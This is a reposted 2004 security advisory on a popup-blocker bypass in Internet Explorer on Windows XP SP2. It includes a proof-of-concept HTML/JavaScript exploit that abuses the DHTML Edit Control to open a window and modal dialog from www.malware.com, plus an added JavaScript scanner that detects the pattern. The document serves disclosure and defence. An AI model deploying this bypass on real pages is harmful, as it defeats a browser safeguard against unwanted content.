Windows XP SP2 Popup Blocker Bypass Vulnerability: Tested Method
Source: Internet excerpt Date: September 25, 2003 18:37:25
Information source: securiteam.com & Evil Octal China (邪恶八进制中国) [E.S.T]
Added by: A^C^E
Date: 14.12.04
Time: 10:27:05
Category: Exploits
Source: http://www.securiteam.com/windowsntfocus/6Y00D0UC0K.html
Summary
Internet Explorer for XP updated with SP2 enjoys a fairly robust popup blocking mechanism. In fact, older vulnerabilities exploited by many sites are no longer possible with the introduction of SP2 and the new popup blocker.
A way to circumvent the popup blocker has been found, and it is easily exploitable, as the proof of concept supplied with this advisory shows.
Details
Vulnerable Systems:
* Internet Explorer on Windows XP SP2
The vulnerability can be exploited to pop up a dialog through the "DHTML Edit Control" using a customized script. Such a script is listed below as a proof of concept:
<body onload="setTimeout(' main() ',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
// 10.11.04 http://www.editive.com
// Opens a new window and a modal dialog; meant to run inside the control's document
function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}
function main()
{
// Define shellscript() in the script context of the document hosted by the DHTML Edit Control
x.DOM.Script.execScript(shellscript.toString());
// Call it from that context, so the popup comes through the control
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
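A defender-side check, added here as an example and not part of the advisory or of the proof of concept: it scans HTML for an object tag that instantiates the DHTML Edit Control CLSID shown above and reports whether script reaches through that object's DOM.Script, the pattern the proof of concept relies on. The function names, the severity labels and the sample input are assumptions made for illustration.

```javascript
// Added example: flags HTML that instantiates the DHTML Edit Control and
// drives script through its DOM.Script object, as the advisory's PoC does.
const DHTML_EDIT_CLSID = "2D360201-FFF5-11d1-8D03-00A0C959BC0A"; // from the advisory

// Return the attributes of every <object> tag as maps with lower-cased keys.
// Tolerates "< object" (space after "<") and attributes split across lines.
function objectTags(html) {
  const tags = [];
  const tagRe = /<\s*object\b([^>]*)>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  for (const m of html.matchAll(tagRe)) {
    const attrs = {};
    for (const a of m[1].matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? "";
    }
    tags.push(attrs);
  }
  return tags;
}

// One finding per embedded DHTML Edit Control (hypothetical result shape).
function scanPage(html) {
  const findings = [];
  for (const attrs of objectTags(html)) {
    // Normalise "clsid:{...}" / "CLSID:..." to the bare GUID before comparing
    const classid = (attrs.classid || "").replace(/^clsid:/i, "").replace(/[{}]/g, "");
    if (classid.toLowerCase() !== DHTML_EDIT_CLSID.toLowerCase()) continue;
    const id = attrs.id || attrs.name || null;
    let scriptBridge = false;
    if (id) {
      // Look for <id>.DOM.Script anywhere in the page's markup or script
      const esc = id.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
      scriptBridge = new RegExp(`\\b${esc}\\s*\\.\\s*DOM\\s*\\.\\s*Script\\b`, "i").test(html);
    }
    findings.push({ id, scriptBridge, severity: scriptBridge ? "high" : "review" });
  }
  return findings;
}

// Constructed sample input (not the advisory's PoC): control plus a script bridge.
const SAMPLE = `<object id="ed" classid="CLSID:2d360201-fff5-11d1-8d03-00a0c959bc0a"></object>
<script>ed.DOM.Script.execScript("void 0");</script>`;
console.log(scanPage(SAMPLE));
```

A page that embeds the control without touching DOM.Script is reported with severity "review" rather than "high", since the control also has legitimate editing uses.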
Additional information
The information has been provided by http-equiv.
(Source: http://www.Gimoo.net)